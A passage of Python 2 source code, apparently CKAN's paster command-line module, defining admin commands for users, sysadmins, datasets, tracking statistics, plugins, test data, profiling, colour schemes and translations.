process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets(self.args[0])
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
from ckan.common import config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir(out_folder):
os.makedirs(out_folder)
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id': dataset_name})
if not dd['state'] == 'active':
continue
url = h.url_for(controller='package', action='read', id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join(out_folder, dd['name']) + ".rdf"
try:
r = urllib2.urlopen(url).read()
except urllib2.HTTPError, e:
if e.code == 404:
error('Please install ckanext-dcat and enable the ' +
'`dcat` plugin to use the RDF serializations')
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write(str(ioe) + "\n")
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd is None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True,
state='active')
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be removed from sysadmins.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state='active')
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
error('Passwords do not match')
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
error('Need name of the user.')
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError('Could not parse arg: %r (expected "<option>=<value>")' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
if 'fullname' in data_dict:
data_dict['fullname'] = data_dict['fullname'].decode(sys.getfilesystemencoding())
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
error(e)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
p.toolkit.get_action('user_delete')(
{'model': model, 'ignore_auth': True},
{'id': username})
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.logic as logic
dataset = self._get_dataset(dataset_ref)
name = dataset.name
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
context = {'user': site_user['name']}
logic.get_action('dataset_purge')(
context, {'id': dataset_ref})
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon [DEPRECATED]
This command is DEPRECATED, use `paster jobs` instead.
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
error('Command %s not recognized' % cmd)
def run_(self):
deprecation_warning(u'Use `paster jobs worker` instead.')
default_ini = os.path.join(os.getcwd(), 'development.ini')
if self.options.config:
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
elif os.path.isfile(default_ini):
os.environ['CKAN_CONFIG'] = default_ini
else:
error('No .ini specified and none was found in current directory')
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
celery_args.append('--concurrency=1')
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
deprecation_warning(u'Use `paster jobs list` instead.')
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
deprecation_warning(u'Use `paster jobs clear` instead.')
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
error('Failed to delete all tasks')
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id == None)  # SQLAlchemy needs ==/.is_(None), not Python's 'is'
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id == None)  # SQLAlchemy needs ==/.is_(None), not Python's 'is'
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
error(self.__class__.__doc__)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
error(self.__class__.__doc__)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. Find the most recent date we already have data for
# and restart from 2 days before it, in case new data has arrived.
# If there is no data at all, use 2011-01-01 as the start date.
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql, measure_from=str(measure_from)).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
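# A sketch of the CSV layout this produces (the data row is hypothetical):
#   dataset id,dataset name,total views,recent views (last 2 weeks)
#   d1b2c3,example-dataset,42,7
# Totals come from _total_views(); the recent figure is looked up per
# dataset id in _recent_views() and defaults to 0 when there is none.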
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)=%s;
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;'''
engine.execute(sql, summary_date)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print '%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date)
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print "Error: package %s not found." % (package_id)
not_found += 1
except KeyboardInterrupt:
print "Stopped."
return
except:
raise
print 'search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else "")
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class': item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc': plugin.__doc__,
'class': plugin,
'implements': []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# if this is a classmethod, remove the first (cls) parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakarenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by pstats.Stats (command-line) or runsnakerun (gui).
Usage:
profile URL [username]
e.g. profile /data/search
The result is saved in ckan.data.search.profile
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
if self.args[1:]:
user = self.args[1]
else:
user = 'visitor'
def profile_url(url):
try:
res = self.app.get(url, status=[200],
extra_environ={'REMOTE_USER': user})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
import pstats
stats = pstats.Stats(output_filename)
stats.sort_stats('cumulative')
stats.print_stats(0.1) # show only top 10% of lines
print 'Only top 10% of lines shown'
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - hex code used as base color, eg '#ff00ff' (must be quoted)
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0f8ff',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred': '#cd5c5c',
'indigo': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370db',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#db7093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors = []
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color = '#FFFFFF'
colors.append(hex_color)
return colors
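# A minimal sketch of the intended output (the hue value is hypothetical):
#   create_colors(0.6)  ->  five '#rrggbb' strings sharing the same hue,
# with lightness stepping up by 8 percentage points per colour (capped at
# white). command() below writes the first len(self.rules) of them into
# custom.less.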
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
f.close()
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from ckan.common import config
from ckan.lib.i18n import build_js_translations
ckan_path = os.path.join(os.path.dirname(__file__), '..')
self.i18n_path = config.get('ckan.i18n_directory',
os.path.join(ckan_path, 'i18n'))
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
build_js_translations()
else:
print 'command not recognised'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations for zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
